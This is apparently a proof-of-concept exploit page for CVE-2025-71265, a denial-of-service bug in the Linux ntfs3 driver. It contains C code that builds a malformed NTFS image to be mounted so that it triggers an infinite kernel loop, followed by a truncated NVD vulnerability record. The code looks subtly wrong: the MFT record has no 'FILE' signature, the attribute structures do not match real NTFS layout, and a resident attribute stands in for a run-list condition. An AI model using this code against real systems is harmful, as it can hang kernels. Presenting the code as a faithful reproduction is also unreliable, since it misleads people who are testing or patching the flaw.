CVE-2025-71265

// CVE-2025-71265 PoC - Malformed NTFS Image Generator // This PoC demonstrates the infinite loop vulnerability in ntfs3 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #pragma pack(push, 1) // NTFS Boot Sector struct ntfs_boot_sector { uint8_t jump[3]; uint8_t oem_id[8]; uint16_t bytes_per_sector; uint8_t sectors_per_cluster; uint16_t reserved_sectors; uint8_t fats; uint16_t root_entries; uint16_t sectors; uint8_t media_type; uint16_t sectors_per_fat; uint16_t sectors_per_track; uint16_t heads; uint32_t hidden_sectors; uint32_t large_sectors; uint64_t total_sectors; int64_t mft_lcn; int64_t mft_mirror_lcn; int32_t clusters_per_mft_record; int32_t clusters_per_index_record; int64_t serial_number; uint32_t checksum; uint8_t bootstrap[426]; uint16_t end_marker; }; // NTFS Attribute Header (resident) struct ntfs_attr_header { uint32_t type; uint16_t length; uint8_t name_length; uint16_t name_offset; uint16_t flags; uint16_t instance; uint8_t resident; uint8_t name_length2; uint16_t offset; uint32_t length2; uint16_t allocated; uint8_t flags2; uint8_t reserved; }; #pragma pack(pop) void create_malformed_ntfs_image(const char *filename) { FILE *fp = fopen(filename, "wb"); if (!fp) { perror("Failed to create file"); return; } // Create a minimal NTFS image with malformed metadata unsigned char sector[512] = {0}; // Boot sector struct ntfs_boot_sector *boot = (struct ntfs_boot_sector *)sector; memcpy(boot->oem_id, "NTFS ", 8); boot->bytes_per_sector = 512; boot->sectors_per_cluster = 1; boot->total_sectors = 1024; boot->mft_lcn = 2; boot->clusters_per_mft_record = -1; // 512 bytes boot->serial_number = 0x1234567890ABCDEF; boot->end_marker = 0xAA55; fwrite(sector, 512, 1, fp); // MFT Record with malformed attribute unsigned char mft_record[1024] = {0}; // Create attribute with evcn=-1 but referenced data struct ntfs_attr_header *attr = (struct ntfs_attr_header *)(mft_record + 56); attr->type = 0x80; // $DATA attr->length = 72; attr->resident = 1; attr->length2 = 0; // Empty length - represents evcn=-1 condition attr->allocated = 0; // This creates the inconsistency: attribute header says empty, // but directory entry references it as containing data fwrite(mft_record, 1024, 1, fp); // Fill rest with zeros memset(sector, 0, 512); for (int i = 0; i < 1021; i++) { fwrite(sector, 512, 1, fp); } fclose(fp); printf("Malformed NTFS image created: %s\n", filename); printf("Mount this image to trigger the infinite loop in attr_load_runs_range\n"); } int main() { create_malformed_ntfs_image("cve-2025-71265.ntfs"); return 0; }

{"cve": {"id": "CVE-2025-71265", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-18T11:16:15.373", "lastModified": "2026-05-20T19:43:23.257", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs: ntfs3: fix infinite loop in attr_load_runs_range on inconsistent metadata\n\nWe found an infinite loop bug in the ntfs3 file system that can lead to a\nDenial-of-Service (DoS) condition.\n\nA malformed NTFS image can cause an infinite loop when an attribute header\nindicates an empty run list, while directory entries reference it as\ncontaining actual data. In NTFS, setting evcn=-1 with svcn=0 is a valid way\nto represent an empty run list, and run_unpack() correctly handles this by\nchecking if evcn + 1 equals svcn and returning early without parsing any run\ndata. However, this creates a problem when there is metadata inconsistency,\nwhere the attribute header claims to be empty (evcn=-1) but the caller\nexpects to read actual data. When run_unpack() immediately returns success\nupon seeing this condition, it leaves the runs_tree uninitialized with\nrun->runs as a NULL. The calling function attr_load_runs_range() assumes\nthat a successful return means that the runs were loaded and sets clen to 0,\nexpecting the next run_lookup_entry() call to succeed. Because runs_tree\nremains uninitialized, run_lookup_entry() continues to fail, and the loop\nincrements vcn by zero (vcn += 0), leading to an infinite loop.\n\nThis patch adds a retry counter to detect when run_lookup_entry() fails\nconsecutively after attr_load_runs_vcn(). If the run is still not found on\nthe second attempt, it indicates corrupted metadata and returns -EINVAL,\npreventing the Denial-of-Service (DoS) vulnerability."}, {"lang": "es", "value": "En el kernel de Linux, se ha resuelto la siguiente vulnerabilidad:\n\nfs: ntfs3: solución de bucle infinito en attr_load_runs_range con metadatos inconsistentes\n\nSe encontró un error de bucle infinito en el sistema de archivos ntfs3 que puede conducir a una condición de Denegación de Servicio (DoS).\n\nUna imagen NTFS malformada puede causar un bucle infinito cuando un encabezado de atributo indica una lista de ejecuciones vacía, mientras que las entradas de directorio lo referencian como si contuviera datos reales. En NTFS, establecer evcn=-1 con svcn=0 es una forma válida de representar una lista de ejecuciones vacía, y run_unpack() lo maneja correctamente verificando si evcn + 1 es igual a svcn y retornando anticipadamente sin analizar ningún dato de ejecución. Sin embargo, esto crea un problema cuando hay inconsistencia de metadatos, donde el encabezado del atributo afirma estar vacío (evcn=-1) pero el llamador espera leer datos reales. Cuando run_unpack() retorna éxito inmediatamente al ver esta condición, deja el runs_tree sin inicializar con run-&gt;runs como NULL. La función llamadora attr_load_runs_range() asume que un retorno exitoso significa que las ejecuciones fueron cargadas y establece clen en 0, esperando que la siguiente llamada a run_lookup_entry() tenga éxito. Debido a que runs_tree permanece sin inicializar, run_lookup_entry() sigue fallando, y el bucle incrementa vcn en cero (vcn += 0), lo que lleva a un bucle infinito.\n\nEste parche agrega un contador de reintentos para detectar cuándo run_lookup_entry() falla consecutivamente después de attr_load_runs_vcn(). Si la ejecución aún no se encuentra en el segundo intento, indica metadatos corruptos y retorna -EINVAL, previniendo la vulnerabilidad de Denegación de Servicio (DoS)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-835"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15", "versionEndExcluding": "5.15.202", "matchCriteriaId": "B0330CE4-09CE-43EF-A9C8-CD49FFD1DC98"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.165", "matchCriteriaId": "797C7F46-D0BE-4FB8-A502-C5EF8E6B6654"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.128", "matchCriteriaId": "851E9353-6C09-4CC9-877E-E09DB164A3C2"}, {"vulnerable": true, "criteria": "cpe:2. ... (truncated)